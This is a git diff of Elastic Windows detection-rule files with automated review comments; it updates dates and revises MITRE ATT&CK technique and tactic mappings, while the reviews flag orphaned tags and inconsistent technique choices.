@@ -2,7 +2,7 @@ creation_date = "2025/08/21" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,14 +80,18 @@ process where host.os.type == "windows" and event.type == "start" and process.na [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1202" name = "Indirect Command Execution" reference = "https://attack.mitre.org/techniques/T1202/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_injection_msbuild.toml b/rules/windows/defense_evasion_injection_msbuild.toml index 742f00543cf..eb5db75d1d3 100755 --- a/rules/windows/defense_evasion_injection_msbuild.toml +++ b/rules/windows/defense_evasion_injection_msbuild.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -76,6 +76,7 @@ process where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" 
@@ -85,27 +86,13 @@ reference = "https://attack.mitre.org/techniques/T1055/" id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/defense_evasion_lolbas_win_cdb_utility.toml b/rules/windows/defense_evasion_lolbas_win_cdb_utility.toml index bc19ee7efbd..760a67eeb77 100644 --- a/rules/windows/defense_evasion_lolbas_win_cdb_utility.toml +++ b/rules/windows/defense_evasion_lolbas_win_cdb_utility.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/24" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
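Review bot: Dropping the second `[[rule.threat]]` block (TA0004 "Privilege Escalation") leaves any `Tactic: Privilege Escalation` entry in this rule's `tags` list, in the `[rule]` table outside this hunk, pointing at a tactic the rule no longer maps, and the visible diff does not update that tag. The same orphan-tag risk applies to defense_evasion_masquerading_suspicious_werfault_childproc, whose Privilege Escalation block is removed further down. Remove the `"Tactic: Privilege Escalation"` tag in the same commit, or note in the description that it was already absent.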
@@ -95,14 +95,23 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_lsass_ppl_disabled_registry.toml b/rules/windows/defense_evasion_lsass_ppl_disabled_registry.toml index 6f434c174de..666ad8bda1e 100644 --- a/rules/windows/defense_evasion_lsass_ppl_disabled_registry.toml +++ b/rules/windows/defense_evasion_lsass_ppl_disabled_registry.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/27" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/02/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -92,6 +92,7 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" 
@@ -101,14 +102,31 @@ reference = "https://attack.mitre.org/techniques/T1112/" id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" + +[[rule.threat.technique.subtechnique]] +id = "T1003.001" +name = "LSASS Memory" +reference = "https://attack.mitre.org/techniques/T1003/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml b/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml index 47bf071a3c6..00ea4e6edd4 100644 --- a/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml +++ b/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/24" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -111,19 +111,28 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" +[[rule.threat.technique.subtechnique]] +id = "T1055.012" +name = "Process Hollowing" +reference = "https://attack.mitre.org/techniques/T1055/012/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_masquerading_renamed_autoit.toml b/rules/windows/defense_evasion_masquerading_renamed_autoit.toml index 182bab1599a..749e89527bc 100644 --- a/rules/windows/defense_evasion_masquerading_renamed_autoit.toml +++ b/rules/windows/defense_evasion_masquerading_renamed_autoit.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/01" integration = ["endpoint", "windows", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/09/01" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
@@ -128,19 +128,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.003" name = "Rename Legitimate Utilities" reference = "https://attack.mitre.org/techniques/T1036/003/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.010" +name = "AutoHotKey & AutoIT" +reference = "https://attack.mitre.org/techniques/T1059/010/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml b/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml index f7808e814e3..7a8e2499e75 100644 --- a/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml +++ b/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/24" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -97,48 +97,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.012" name = "Image File Execution Options Injection" reference = "https://attack.mitre.org/techniques/T1546/012/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" -[[rule.threat.technique.subtechnique]] -id = "T1546.012" -name = "Image File Execution Options Injection" -reference = "https://attack.mitre.org/techniques/T1546/012/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/defense_evasion_microsoft_defender_tampering.toml b/rules/windows/defense_evasion_microsoft_defender_tampering.toml index 2b7315a7978..7e8e3addb77 100644 --- a/rules/windows/defense_evasion_microsoft_defender_tampering.toml +++ b/rules/windows/defense_evasion_microsoft_defender_tampering.toml 
@@ -2,7 +2,7 @@ creation_date = "2021/10/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Austin Songer"] @@ -140,6 +140,7 @@ registry where host.os.type == "windows" and event.type == "change" and process. [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" @@ -150,9 +151,12 @@ id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_msbuild_making_network_connections.toml b/rules/windows/defense_evasion_msbuild_making_network_connections.toml index 5f9e895759c..0a7daa1afcf 100644 --- a/rules/windows/defense_evasion_msbuild_making_network_connections.toml +++ b/rules/windows/defense_evasion_msbuild_making_network_connections.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
@@ -146,19 +146,31 @@ sequence by process.entity_id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/windows/defense_evasion_mshta_susp_child.toml b/rules/windows/defense_evasion_mshta_susp_child.toml index 2d5a06f7b7f..bbf270aa628 100644 --- a/rules/windows/defense_evasion_mshta_susp_child.toml +++ b/rules/windows/defense_evasion_mshta_susp_child.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
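Review bot: The new Command and Control entry maps the MSBuild network-connection rule to `T1071` (Application Layer Protocol), while the parallel msxsl and msiexec network-connection rules in this same patch map the equivalent behaviour to `T1105` (Ingress Tool Transfer); the two choices make LOLBin-egress coverage reports non-comparable, so pick one convention and state the rationale. A bare `network` event from msbuild.exe gives the sequence query (outside this hunk) no visibility of the protocol in use, so T1071 asserts more than the rule can observe; T1105, or no C2 technique at all if the intent is simply "unexpected egress", is easier to defend. If the consistency fix is accepted the three lines become `id = "T1105"` / `name = "Ingress Tool Transfer"` / `reference = "https://attack.mitre.org/techniques/T1105/"`. Either way `"Tactic: Command and Control"` must also be added to `tags` outside this hunk.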
@@ -93,19 +93,51 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" reference = "https://attack.mitre.org/techniques/T1218/005/" +[[rule.threat.technique.subtechnique]] +id = "T1218.007" +name = "Msiexec" +reference = "https://attack.mitre.org/techniques/T1218/007/" +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_msiexec_remote_payload.toml b/rules/windows/defense_evasion_msiexec_remote_payload.toml index ba656ec2c14..7d424238572 100644 --- a/rules/windows/defense_evasion_msiexec_remote_payload.toml +++ b/rules/windows/defense_evasion_msiexec_remote_payload.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
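Review bot: Adding `T1218.007` (Msiexec) and `T1218.011` (Rundll32) to a rule whose file name and prior mapping are specific to mshta.exe asserts that the EQL query now matches msiexec.exe/rundll32.exe, but the query is outside this hunk; if those binaries appear only as suspicious children of mshta, the mapping is defensible, whereas if the query still keys solely on mshta.exe they over-state coverage and should be dropped. The new Execution entry (PowerShell, Windows Command Shell) is a sensible addition for a suspicious-child rule. `"Tactic: Execution"` must also be appended to the rule's `tags` outside this hunk. Style: the two new `[[rule.threat.technique.subtechnique]]` tables are appended with no blank separator, unlike the spacing this patch introduces between the other tables in the same file.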
@@ -92,19 +92,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.007" name = "Msiexec" reference = "https://attack.mitre.org/techniques/T1218/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/windows/defense_evasion_msxsl_network.toml b/rules/windows/defense_evasion_msxsl_network.toml index b4eaa6909a3..04e635393b9 100644 --- a/rules/windows/defense_evasion_msxsl_network.toml +++ b/rules/windows/defense_evasion_msxsl_network.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -85,14 +85,26 @@ sequence by process.entity_id [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1220" name = "XSL Script Processing" reference = "https://attack.mitre.org/techniques/T1220/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" 
diff --git a/rules/windows/defense_evasion_network_connection_from_windows_binary.toml b/rules/windows/defense_evasion_network_connection_from_windows_binary.toml index 1d239873113..8bd8d22974b 100644 --- a/rules/windows/defense_evasion_network_connection_from_windows_binary.toml +++ b/rules/windows/defense_evasion_network_connection_from_windows_binary.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/09/01" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
@@ -166,34 +166,73 @@ sequence by process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" - [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" +[[rule.threat.technique.subtechnique]] +id = "T1127.002" +name = "ClickOnce" +reference = "https://attack.mitre.org/techniques/T1127/002/" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.002" +name = "Control Panel" +reference = "https://attack.mitre.org/techniques/T1218/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.003" +name = "CMSTP" +reference = "https://attack.mitre.org/techniques/T1218/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.004" +name = "InstallUtil" +reference = "https://attack.mitre.org/techniques/T1218/004/" + [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" reference = "https://attack.mitre.org/techniques/T1218/005/" +[[rule.threat.technique.subtechnique]] +id = "T1218.007" +name = "Msiexec" +reference = "https://attack.mitre.org/techniques/T1218/007/" +[[rule.threat.technique.subtechnique]] +id = "T1218.008" +name = "Odbcconf" +reference = "https://attack.mitre.org/techniques/T1218/008/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" [rule.threat.tactic] id = "TA0005" name = 
"Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_parent_process_pid_spoofing.toml b/rules/windows/defense_evasion_parent_process_pid_spoofing.toml index 49a6b6d135d..dde5e4ad59f 100644 --- a/rules/windows/defense_evasion_parent_process_pid_spoofing.toml +++ b/rules/windows/defense_evasion_parent_process_pid_spoofing.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/14" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -114,36 +114,18 @@ Parent Process PID Spoofing involves manipulating the parent process identifier [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" + [[rule.threat.technique.subtechnique]] id = "T1134.004" name = "Parent PID Spoofing" reference = "https://attack.mitre.org/techniques/T1134/004/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1134" -name = "Access Token Manipulation" -reference = "https://attack.mitre.org/techniques/T1134/" -[[rule.threat.technique.subtechnique]] -id = "T1134.004" -name = "Parent PID Spoofing" -reference = "https://attack.mitre.org/techniques/T1134/004/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml b/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml index 7e8558da51c..bf0b6c60dc4 100644 --- a/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml +++ b/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml 
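Review bot: Seven sub-techniques (`T1127.002`, `T1218.002/.003/.004/.007/.008/.010`) are added at once, so the mapping now asserts that ClickOnce hosts, control.exe, cmstp.exe, InstallUtil.exe, msiexec.exe, odbcconf.exe and regsvr32.exe are all in the `process.name` set of the sequence query, which sits outside this hunk; confirm each binary is actually matched, because an unmatched entry makes the ATT&CK coverage report over-report for this rule. If the query already matched these binaries and this is a pure metadata catch-up, a line saying so in the rule description would help future reviewers. Style: the `.007` and `.008` tables are inserted without the blank line that separates the surrounding sub-technique tables.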
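Review bot: The removed `[[rule.threat]]` block was the only one placing T1134.004 (Parent PID Spoofing) under Privilege Escalation (TA0004); the retained entry keeps it under Defense Evasion only, so this rule's Privilege Escalation coverage disappears rather than being de-duplicated. ATT&CK lists T1134 under both tactics, so the second entry reads as intentional; keep it with its whitespace normalised (`[rule.threat.tactic]` / `id = "TA0004"` / `name = "Privilege Escalation"`) unless the coverage change is deliberate. If it is deliberate, `"Tactic: Privilege Escalation"` must also come out of `tags` (outside this hunk) and the coverage change should be called out in the PR description.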
@@ -2,7 +2,7 @@ creation_date = "2022/11/01" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -109,36 +109,46 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.002" +name = "Bypass User Account Control" +reference = "https://attack.mitre.org/techniques/T1548/002/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.002" name = "Pass the Hash" reference = "https://attack.mitre.org/techniques/T1550/002/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/defense_evasion_posh_assembly_load.toml b/rules/windows/defense_evasion_posh_assembly_load.toml index b21cc5070cd..4b9f5f88ab7 100644 --- a/rules/windows/defense_evasion_posh_assembly_load.toml +++ b/rules/windows/defense_evasion_posh_assembly_load.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/15" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -148,10 +148,12 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" + [[rule.threat.technique.subtechnique]] id = "T1055.001" name = "Dynamic-link Library Injection" @@ -162,35 +164,38 @@ id = "T1055.002" name = "Portable Executable Injection" reference = "https://attack.mitre.org/techniques/T1055/002/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" [[rule.threat.technique]] id = "T1620" name = "Reflective Code Loading" reference = "https://attack.mitre.org/techniques/T1620/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_compressed.toml b/rules/windows/defense_evasion_posh_compressed.toml index 1af9d0caffa..c012fa70ca4 100644 --- a/rules/windows/defense_evasion_posh_compressed.toml +++ b/rules/windows/defense_evasion_posh_compressed.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/19" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -149,39 +149,44 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.015" +name = "Compression" +reference = "https://attack.mitre.org/techniques/T1027/015/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_encryption.toml b/rules/windows/defense_evasion_posh_encryption.toml index c5e38dabe16..9119cddd78b 100644 --- a/rules/windows/defense_evasion_posh_encryption.toml +++ b/rules/windows/defense_evasion_posh_encryption.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/23" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -140,22 +140,39 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.013" +name = "Encrypted/Encoded File" +reference = "https://attack.mitre.org/techniques/T1027/013/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1486" +name = "Data Encrypted for Impact" +reference = "https://attack.mitre.org/techniques/T1486/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_high_entropy.toml b/rules/windows/defense_evasion_posh_high_entropy.toml index 4519eaa5024..1c33761d18a 100644 --- a/rules/windows/defense_evasion_posh_high_entropy.toml +++ b/rules/windows/defense_evasion_posh_high_entropy.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/08" integration = ["windows"] maturity = "production" -updated_date = "2026/01/08" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
